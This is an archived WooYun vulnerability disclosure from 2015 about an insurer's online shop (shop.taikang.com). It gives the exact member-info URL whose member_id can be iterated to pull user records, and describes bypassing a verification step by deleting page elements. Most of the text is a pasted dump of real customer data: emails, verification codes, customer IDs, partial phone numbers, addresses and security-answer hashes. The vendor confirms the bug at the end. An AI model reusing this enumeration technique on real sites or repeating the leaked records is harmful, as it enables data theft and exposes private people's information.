乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-15: 细节已通知厂商并且等待厂商处理中 2015-08-17: 厂商已经确认,细节仅向厂商公开 2015-08-27: 细节向核心白帽子及相关领域专家公开 2015-09-06: 细节向普通白帽子公开 2015-09-16: 细节向实习白帽子公开 2015-10-01: 细节向公众公开
神器之····一个神器的接口!
http://shop.taikang.com/tkecs/service/memberinfo/init?&member_id=13888612&flow_id=1001
遍历member_id即可取得百万用户信息,你说危害大不大!
用身份证号+密码登陆下!
成功登录,,但是访问个人中心的时候发现有验证。我们可以这样破掉他!
选中所选框,删除!
还有一层,按照上面方法!删除!正常了!
===========================================我们还是回到那个接口,遍历下!
***** "[email protected]","computeFlag":"Y","weight":0,"memberVerifyCode":"623915","areacod**********:3,"cidTypeId":"01","cifNo":"5048628845","address":"éåå¿åå± "[email protected]","computeFlag":"Y",&quo**********cidTypeId":"01","cifNo":"5074010138","partyId":"56813004699254 "[email protected]","memberVerifyCode":"000000","memberTyp**********ypeId":"01","cifNo":"5050610162","partyId":"1966811722","a "[email protected]","memberType":"3","companyNo":**********quot;:"01","memberIfemail":"N","partyId":"1969754148","ad "[email protected]","memberVerifyCode":"736073","memberType&q**********cidTypeId":"01","partyId":"348129994061343040","address":"æ°æ "[email protected]","memberType":"3",&qu**********om","weight":0,"memberType":"3","areacode":"00000001000510000000","companyNo"**********quot;:"0","memtypeId":"9","memberId": "[email protected]","memberType":"3","areacode":"**********;:"0","memtypeId":"9","memberId": "[email protected]","memberType":"3","areacode":"00000001000**********"0","memtypeId":"5","memberId": "[email protected]","memberType":"4","areacode":"00000001000W500**********"0","memtypeId":"9","memberId": "[email protected]","memberType":"3","areacode":"00000001000I100**********quot;memberType":"3","areacode":"00000001000210000000","companyNo":"2","memberFlag&quo**********peId":"01","partyId":"165127953173988710","address":"ææ "[email protected]","computeFlag":"Y","memberVerify**********d":"01","partyId":"610139987086686606","address":"æè "[email protected]","computeFlag":"Y","memberType":"**********;,"weight":0,"memberType":"3","areacode":"00000001000R10000000","companyNo":"**********;:"0","memtypeId":"5","memberId": "[email protected]","memberType":"4","areacode":"00000001000**********emberAnswer":"edee28cdd27f28f340062a4d0e "[email protected]","memberVerifyCode":"529507","memberType":"3","companyNo**********t;:"1","memtypeId":"9","memberId": "[email protected]","memberType":"3","areacode":"00000001000I10**********cidTypeId":"01","memtypeId":"5","memberGender":"0","memberId": "[email protected]","computeFlag":"Y","**********"1","memtypeId":"9","member "[email protected]","memberType":"3","areacode":"00000001000310000000**********ypeId":"01","memtypeId":"9","memberGender":"0","memberId": "[email protected]","computeFlag":"Y","companyNo**********ypeId":"01","partyId":"1968436143","address":"å京å¸ç³ "[email protected]","memberType":"3","companyNo&qu**********"cidTypeId":"01","partyId":"422127475851842784","address":" "[email protected]","memberType":"3","companyNo"**********uot;:"01","memberAnswer":"d1b566e63422e94684c50da8f14511 "[email protected]","computeFlag":"N","memberVerifyCode":"324500&qu**********t;memberAnswer":"30e74d3f51b9554994b96f74551877db","memberIfemail "[email protected]","computeFlag":"Y","memberVerifyCode":"531560&q**********quot;,"memberIfemail":"N","cifNo":"5022497161","part "[email protected]","computeFlag":"N","memberVerifyCode":"2**********;" 139****8631","memberGen**********;" 135****1930","memberGen**********1","memberIfemail":"N","partyId":"1950245036","me "[email protected]","computeFlag":"Y","memberVerifyCode":&qu**********","memberIfemail":"N","cifNo":"5062831043","part "[email protected]","computeFlag":"Y","memberVerifyCode":"**********t;01","memberIfemail":"N","cifNo":"5063753717"," "[email protected]","computeFlag":"Y","memberVerifyCode":&quo**********1","memberIfemail":"N","cifNo":"5067166751"," "[email protected]","computeFlag":"Y","memberVerifyCode":"505**********1","memberIfemail":"N","cifNo":"5046269671","part "[email protected]","computeFlag":"Y","memberVerifyCode":&qu**********"01","memberIfemail":"N","cifNo":"5051069796"," "[email protected]","computeFlag":"Y","memberVerifyCode&quo**********eId":"01","memberAnswer":"851f1c973e82b35b44013463fcbd65 "[email protected]","computeFlag":"Y","memberType":&q**********ot;01","memberIfemail":"Y","cifNo":"0027533233"," "[email protected]","computeFlag":"Y","memberVerifyCode":"8**********quot;:"01","memberIfemail":"N","partyId":"872127476192559 "[email protected]","computeFlag":"Y","memberVer**********quot;:"01","memberIfemail":"N","partyId":"162127475502870 "[email protected]","computeFlag":"Y","memberVerify**********"01","memberIfemail":"Y","cifNo":"5052655069","part "[email protected]","computeFlag":"Y","memb**********quot;:"01","memberIfemail":"N","cifNo":"0048028403"," "[email protected]","computeFlag":"Y","memberVe**********ot;:"01","memberIfemail":"N","partyId":"377127475982835 "[email protected]","computeFlag":"Y","memberVerifyCode**********ot;,"memberIfemail":"Y","cifNo":"5071095921","part "[email protected]","computeFlag":"Y","memberVerifyCode":"1560**********"01","memberIfemail":"N","cifNo":"0158850103","part "[email protected]","computeFlag":"Y","memberVerifyC**********ot;01","memberIfemail":"N","partyId":"721272069736039 "[email protected]","computeFlag":"Y","memberVerifyCode":"9**********"01","memberIfemail":"N","partyId":"368127200537294 "[email protected]","computeFlag":"Y","memberVerifyCode":&**********quot;:"01","memberIfemail":"N","cifNo":"4005758212"," "[email protected]","computeFlag":"Y","member**********ot;01","memberIfemail":"N","partyId":"460125594317239 "[email protected]","computeFlag":"Y","memberVerifyCode":"3**********ypeId":"01","memberIfemail":"N","partyId":"52512588145 "[email protected]","computeFlag":"Y","memberV**********;:"01","memberIfemail":"N","cifNo":"0048475553","part "[email protected]","computeFlag":"Y","memberVe**********","memberIfemail":"N","cifNo":"0021307873","part "[email protected]","computeFlag":"Y","memberVerifyCode":"**********","memberIfemail":"N","cifNo":"5024472009","part "[email protected]","computeFlag":"Y","memberVerifyCode":&quo**********ot;01","memberIfemail":"N","cifNo":"0173258176"," "[email protected]","computeFlag":"Y","memberVerifyCode":&qu**********","memberIfemail":"N","cifNo":"5022639378","part "[email protected]","computeFlag":"Y","memberVerifyCode":"**********;01","memberIfemail":"N","partyId":"382126501897045 "[email protected]","computeFlag":"Y","memberVerifyCode":"3978**********ot;01","memberIfemail":"N","cifNo":"5070017389","part "[email protected]","computeFlag":"N","memberVerifyCode&q**********uot;01","memberIfemail":"N","cifNo":"5091025649","part "[email protected]","computeFlag":"N","memberVerifyCod**********d":"01","partyId":"706127503575932641","address":"éå "[email protected]","computeFlag":"Y","memberType":&quo**********eId":"01","address":"æ²³åçéå·å¸éæ°´åºä¸é "[email protected]","computeFlag":"Y","memberType":&q**********;01","memberIfemail":"Y","cifNo":"0140304447","part "[email protected]","computeFlag":"Y","memberVerifyCode"**********eId":"01","address":"æ²³åçéå·å¸éæ°´åºä¸é "[email protected]","computeFlag":"Y","memberType":&**********"01","memberIfemail":"N","partyId":"203126922934 "[email protected]","computeFlag":"Y","memberVerifyCode":"0**********,"memberIfemail":"N","cifNo":"0186588581","part "[email protected]","computeFlag":"Y","memberVerifyCode":"050655&q**********","memberIfemail":"N","cifNo":"5063626652"," "[email protected]","computeFlag":"N","memberVerifyCode":"8557**********uot;01","partyId":"1950511812","memtypeId":"9","member "[email protected]","computeFlag":"Y","memberT**********uot;01","partyId":"1966965593","memtypeId":"9","member "[email protected]","computeFlag":"Y","memberT**********;01","memberIfemail":"N","partyId":"784126778423414 "[email protected]","computeFlag":"Y","memberVerifyCode":"04268**********:"01","memberIfemail":"N","partyId":"183125031467024 "[email protected]","computeFlag":"Y","memberVerifyCode":**********","memberIfemail":"N","partyId":"879127410452290 "[email protected]","computeFlag":"Y","memberVerifyCode":"998684&q**********ot;01","memberIfemail":"N","partyId":"618127432442155 "[email protected]","computeFlag":"Y","memberVerifyCode":"0**********ot;:"01","partyId":"1971351890","memtypeId":"9","member "[email protected]","computeFlag":"Y",&quo**********eId":"01","partyId":"808143946930935466","address":" "[email protected]","computeFlag":"Y","memberType":"3"**********":"01","address":"å京å¸æé³åºåéå ¡ç²3 "[email protected]","computeFlag":"Y","memberType":&**********quot;,"memberIfemail":"N","partyId":"656125203410683 "[email protected]","computeFlag":"Y","memberVerifyCode":"173814"**********"01","partyId":"1958407718","memtypeId":"9","member "[email protected]","computeFlag":"Y","memb**********uot;01","partyId":"1955723770","memtypeId":"9","member "[email protected]","computeFlag":"Y","memberT**********ot;:"01","address":"广ä¸çæ±é¨æ©å¹³å¸æ©åæ©æ "[email protected]","computeFlag":"Y","memberType":**********ot;:"01","address":"æ·±å³å¸å®å®åºç¦æ°¸è¡éæ¡¥å¤ "[email protected]","computeFlag":"Y","memberType":**********eFlag":"Y"," 1954-10-28","memberPassword&quo*****
这么多多,,给20rank不多吧??
危害等级:高
漏洞Rank:15
确认时间:2015-08-17 11:49
非常感谢您发现并提交给我们,已安排人处理!
暂无